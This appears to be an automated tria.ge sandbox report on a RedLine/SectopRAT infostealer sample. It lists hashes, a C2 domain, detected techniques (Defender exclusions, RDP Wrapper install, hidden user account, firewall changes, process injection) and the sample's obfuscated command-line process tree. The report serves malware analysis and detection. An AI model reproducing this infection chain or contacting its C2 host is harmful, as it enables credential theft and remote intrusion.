Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
22/12/2024, 02:17
Static task
static1
Behavioral task
behavioral1
Sample
f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
Resource
win10v2004-20241007-en
General
-
Target
f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe
-
Size
4.1MB
-
MD5
166ad2bad1b89030246c845ef575cb09
-
SHA1
5875242be7725edd2fc582350d352496d4da1b56
-
SHA256
f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14
-
SHA512
c24e79e0adbcb666ac9ba4839441f787cd10fc98a832ae2ecaaffddfa6ffd455f3121bb634e96651931d994426073084bf35685f0372d5b8794e6654640677ef
-
SSDEEP
98304:E1E7x7WKpOEYMP8TTjPnPCDexiO75F1Nv6563Y:E1E7x7WFoEWNO1Nxo
Malware Config
Extracted
redline
ads6
bhajhhsy6.fun:80
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral1/memory/2144-70-0x00000000000D0000-0x00000000000EC000-memory.dmp family_redline behavioral1/memory/2144-71-0x00000000000D0000-0x00000000000EC000-memory.dmp family_redline behavioral1/memory/2144-67-0x00000000000D0000-0x00000000000EC000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 3 IoCs
resource yara_rule behavioral1/memory/2144-70-0x00000000000D0000-0x00000000000EC000-memory.dmp family_sectoprat behavioral1/memory/2144-71-0x00000000000D0000-0x00000000000EC000-memory.dmp family_sectoprat behavioral1/memory/2144-67-0x00000000000D0000-0x00000000000EC000-memory.dmp family_sectoprat -
Sectoprat family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 1668 net.exe 1520 net1.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 32 1740 WScript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2056 powershell.exe 2080 powershell.exe 2548 powershell.exe 2920 powershell.exe 604 powershell.exe 2176 powershell.exe 2888 powershell.exe 1360 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Modifies Windows Firewall 2 TTPs 5 IoCs
pid Process 1604 netsh.exe 2424 netsh.exe 1748 netsh.exe 2188 netsh.exe 2820 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Executes dropped EXE 13 IoCs
pid Process 2932 Potere.exe.com 2812 Potere.exe.com 2912 Riscalda.exe.com 2740 Riscalda.exe.com 2688 Desideri.exe.com 2092 Desideri.exe.com 2144 RegAsm.exe 1920 Potere.exe.com 2588 RegAsm.exe 3040 RDPWInst.exe 1752 RDPWInst.exe 1280 RDPWInst.exe 1600 RDPWInst.exe -
Loads dropped DLL 13 IoCs
pid Process 2788 cmd.exe 2788 cmd.exe 2788 cmd.exe 2092 Desideri.exe.com 2740 Riscalda.exe.com 2144 RegAsm.exe 2588 RegAsm.exe 2764 cmd.exe 2764 cmd.exe 2276 Process not Found 2764 cmd.exe 2764 cmd.exe 2712 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 23 raw.githubusercontent.com 8 raw.githubusercontent.com 9 raw.githubusercontent.com 22 raw.githubusercontent.com -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/2588-80-0x0000000000450000-0x000000000063C000-memory.dmp autoit_exe behavioral1/memory/2588-83-0x0000000000450000-0x000000000063C000-memory.dmp autoit_exe behavioral1/memory/2588-86-0x0000000000450000-0x000000000063C000-memory.dmp autoit_exe -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\dnsrsvlr.log svchost.exe File opened for modification C:\Windows\system32\CatRoot2\edb.chk svchost.exe File opened for modification C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb svchost.exe File opened for modification C:\Windows\System32\null cmd.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb svchost.exe File created C:\Windows\System32\null cmd.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\CatRoot2\edb.log svchost.exe File opened for modification C:\Windows\System32\asyncreg.log svchost.exe -
Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\EGocAeBsIQ = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\EGocAeBsIQ = "0" reg.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2740 set thread context of 2144 2740 Riscalda.exe.com 48 PID 2812 set thread context of 1920 2812 Potere.exe.com 46 PID 2092 set thread context of 2588 2092 Desideri.exe.com 47 -
Drops file in Program Files directory 9 IoCs
description ioc Process File opened for modification C:\Program Files\RDP Wrapper RegAsm.exe File opened for modification C:\Program Files\RDP Wrapper\RDPWInst.exe RegAsm.exe File created C:\Program Files\RDP Wrapper\rdpwrap.bat RegAsm.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.bat RegAsm.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File created C:\Program Files\RDP Wrapper\RDPWInst.exe RegAsm.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2216 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 15 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Desideri.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Desideri.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Riscalda.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Potere.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Potere.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fsutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Riscalda.exe.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language makecab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2772 PING.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 2796 timeout.exe 2220 timeout.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2772 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1924 schtasks.exe 2440 schtasks.exe 1712 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2056 powershell.exe 2080 powershell.exe 2888 powershell.exe 2548 powershell.exe 2712 svchost.exe 2712 svchost.exe 2920 powershell.exe 604 powershell.exe 1360 powershell.exe 2176 powershell.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 2276 Process not Found 1776 Process not Found 2712 svchost.exe 2712 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2144 RegAsm.exe Token: SeIncreaseQuotaPrivilege 1796 WMIC.exe Token: SeSecurityPrivilege 1796 WMIC.exe Token: SeTakeOwnershipPrivilege 1796 WMIC.exe Token: SeLoadDriverPrivilege 1796 WMIC.exe Token: SeSystemProfilePrivilege 1796 WMIC.exe Token: SeSystemtimePrivilege 1796 WMIC.exe Token: SeProfSingleProcessPrivilege 1796 WMIC.exe Token: SeIncBasePriorityPrivilege 1796 WMIC.exe Token: SeCreatePagefilePrivilege 1796 WMIC.exe Token: SeBackupPrivilege 1796 WMIC.exe Token: SeRestorePrivilege 1796 WMIC.exe Token: SeShutdownPrivilege 1796 WMIC.exe Token: SeDebugPrivilege 1796 WMIC.exe Token: SeSystemEnvironmentPrivilege 1796 WMIC.exe Token: SeRemoteShutdownPrivilege 1796 WMIC.exe Token: SeUndockPrivilege 1796 WMIC.exe Token: SeManageVolumePrivilege 1796 WMIC.exe Token: 33 1796 WMIC.exe Token: 34 1796 WMIC.exe Token: 35 1796 WMIC.exe Token: SeIncreaseQuotaPrivilege 1796 WMIC.exe Token: SeSecurityPrivilege 1796 WMIC.exe Token: SeTakeOwnershipPrivilege 1796 WMIC.exe Token: SeLoadDriverPrivilege 1796 WMIC.exe Token: SeSystemProfilePrivilege 1796 WMIC.exe Token: SeSystemtimePrivilege 1796 WMIC.exe Token: SeProfSingleProcessPrivilege 1796 WMIC.exe Token: SeIncBasePriorityPrivilege 1796 WMIC.exe Token: SeCreatePagefilePrivilege 1796 WMIC.exe Token: SeBackupPrivilege 1796 WMIC.exe Token: SeRestorePrivilege 1796 WMIC.exe Token: SeShutdownPrivilege 1796 WMIC.exe Token: SeDebugPrivilege 1796 WMIC.exe Token: SeSystemEnvironmentPrivilege 1796 WMIC.exe Token: SeRemoteShutdownPrivilege 1796 WMIC.exe Token: SeUndockPrivilege 1796 WMIC.exe Token: SeManageVolumePrivilege 1796 WMIC.exe Token: 33 1796 WMIC.exe Token: 34 1796 WMIC.exe Token: 35 1796 WMIC.exe Token: SeIncreaseQuotaPrivilege 2124 WMIC.exe Token: SeSecurityPrivilege 2124 WMIC.exe Token: SeTakeOwnershipPrivilege 2124 WMIC.exe Token: SeLoadDriverPrivilege 2124 WMIC.exe Token: SeSystemProfilePrivilege 2124 WMIC.exe Token: SeSystemtimePrivilege 2124 WMIC.exe Token: SeProfSingleProcessPrivilege 2124 WMIC.exe Token: SeIncBasePriorityPrivilege 2124 WMIC.exe Token: SeCreatePagefilePrivilege 2124 WMIC.exe Token: SeBackupPrivilege 2124 WMIC.exe Token: SeRestorePrivilege 2124 WMIC.exe Token: SeShutdownPrivilege 2124 WMIC.exe Token: SeDebugPrivilege 2124 WMIC.exe Token: SeSystemEnvironmentPrivilege 2124 WMIC.exe Token: SeRemoteShutdownPrivilege 2124 WMIC.exe Token: SeUndockPrivilege 2124 WMIC.exe Token: SeManageVolumePrivilege 2124 WMIC.exe Token: 33 2124 WMIC.exe Token: 34 2124 WMIC.exe Token: 35 2124 WMIC.exe Token: SeIncreaseQuotaPrivilege 2124 WMIC.exe Token: SeSecurityPrivilege 2124 WMIC.exe Token: SeTakeOwnershipPrivilege 2124 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1628 wrote to memory of 2632 1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe 31 PID 1628 wrote to memory of 2632 1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe 31 PID 1628 wrote to memory of 2632 1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe 31 PID 1628 wrote to memory of 2632 1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe 31 PID 1628 wrote to memory of 1908 1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe 33 PID 1628 wrote to memory of 1908 1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe 33 PID 1628 wrote to memory of 1908 1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe 33 PID 1628 wrote to memory of 1908 1628 f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe 33 PID 1908 wrote to memory of 2788 1908 cmd.exe 35 PID 1908 wrote to memory of 2788 1908 cmd.exe 35 PID 1908 wrote to memory of 2788 1908 cmd.exe 35 PID 1908 wrote to memory of 2788 1908 cmd.exe 35 PID 2788 wrote to memory of 2888 2788 cmd.exe 36 PID 2788 wrote to memory of 2888 2788 cmd.exe 36 PID 2788 wrote to memory of 2888 2788 cmd.exe 36 PID 2788 wrote to memory of 2888 2788 cmd.exe 36 PID 2788 wrote to memory of 2932 2788 cmd.exe 37 PID 2788 wrote to memory of 2932 2788 cmd.exe 37 PID 2788 wrote to memory of 2932 2788 cmd.exe 37 PID 2788 wrote to memory of 2932 2788 cmd.exe 37 PID 2788 wrote to memory of 2828 2788 cmd.exe 38 PID 2788 wrote to memory of 2828 2788 cmd.exe 38 PID 2788 wrote to memory of 2828 2788 cmd.exe 38 PID 2788 wrote to memory of 2828 2788 cmd.exe 38 PID 2932 wrote to memory of 2812 2932 Potere.exe.com 39 PID 2932 wrote to memory of 2812 2932 Potere.exe.com 39 PID 2932 wrote to memory of 2812 2932 Potere.exe.com 39 PID 2932 wrote to memory of 2812 2932 Potere.exe.com 39 PID 2788 wrote to memory of 2912 2788 cmd.exe 40 PID 2788 wrote to memory of 2912 2788 cmd.exe 40 PID 2788 wrote to memory of 2912 2788 cmd.exe 40 PID 2788 wrote to memory of 2912 2788 cmd.exe 40 PID 2788 wrote to memory of 2832 2788 cmd.exe 41 PID 2788 wrote to memory of 2832 2788 cmd.exe 41 PID 2788 wrote to memory of 2832 2788 cmd.exe 41 PID 2788 wrote to memory of 2832 2788 cmd.exe 41 PID 2912 wrote to memory of 2740 2912 Riscalda.exe.com 42 PID 2912 wrote to memory of 2740 2912 Riscalda.exe.com 42 PID 2912 wrote to memory of 2740 2912 Riscalda.exe.com 42 PID 2912 wrote to memory of 2740 2912 Riscalda.exe.com 42 PID 2788 wrote to memory of 2688 2788 cmd.exe 43 PID 2788 wrote to memory of 2688 2788 cmd.exe 43 PID 2788 wrote to memory of 2688 2788 cmd.exe 43 PID 2788 wrote to memory of 2688 2788 cmd.exe 43 PID 2788 wrote to memory of 2772 2788 cmd.exe 44 PID 2788 wrote to memory of 2772 2788 cmd.exe 44 PID 2788 wrote to memory of 2772 2788 cmd.exe 44 PID 2788 wrote to memory of 2772 2788 cmd.exe 44 PID 2688 wrote to memory of 2092 2688 Desideri.exe.com 45 PID 2688 wrote to memory of 2092 2688 Desideri.exe.com 45 PID 2688 wrote to memory of 2092 2688 Desideri.exe.com 45 PID 2688 wrote to memory of 2092 2688 Desideri.exe.com 45 PID 2812 wrote to memory of 1920 2812 Potere.exe.com 46 PID 2812 wrote to memory of 1920 2812 Potere.exe.com 46 PID 2812 wrote to memory of 1920 2812 Potere.exe.com 46 PID 2812 wrote to memory of 1920 2812 Potere.exe.com 46 PID 2092 wrote to memory of 2588 2092 Desideri.exe.com 47 PID 2092 wrote to memory of 2588 2092 Desideri.exe.com 47 PID 2092 wrote to memory of 2588 2092 Desideri.exe.com 47 PID 2092 wrote to memory of 2588 2092 Desideri.exe.com 47 PID 2092 wrote to memory of 2588 2092 Desideri.exe.com 47 PID 2092 wrote to memory of 2588 2092 Desideri.exe.com 47 PID 2092 wrote to memory of 2588 2092 Desideri.exe.com 47 PID 2740 wrote to memory of 2144 2740 Riscalda.exe.com 48
Processes
-
C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe"C:\Users\Admin\AppData\Local\Temp\f2c199a1927f2b2eff8a5fe04c9b8d2178831dd60ac560f01f10bb6103ff9c14.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\makecab.exe"C:\Windows\System32\makecab.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c FHaltkaUYOvf & xkCNwAXEEDcq & BsWHxifyTEoE & cmd < Rimasta.xltx2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\cmd.execmd3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx4⤵
- System Location Discovery: System Language Discovery
PID:2888
-
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.comPotere.exe.com A4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.comC:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com A5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.comC:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Potere.exe.com6⤵
- Executes dropped EXE
PID:1920
-
-
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx4⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.comRiscalda.exe.com Z4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.comC:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Riscalda.exe.com Z5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exeC:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe6⤵
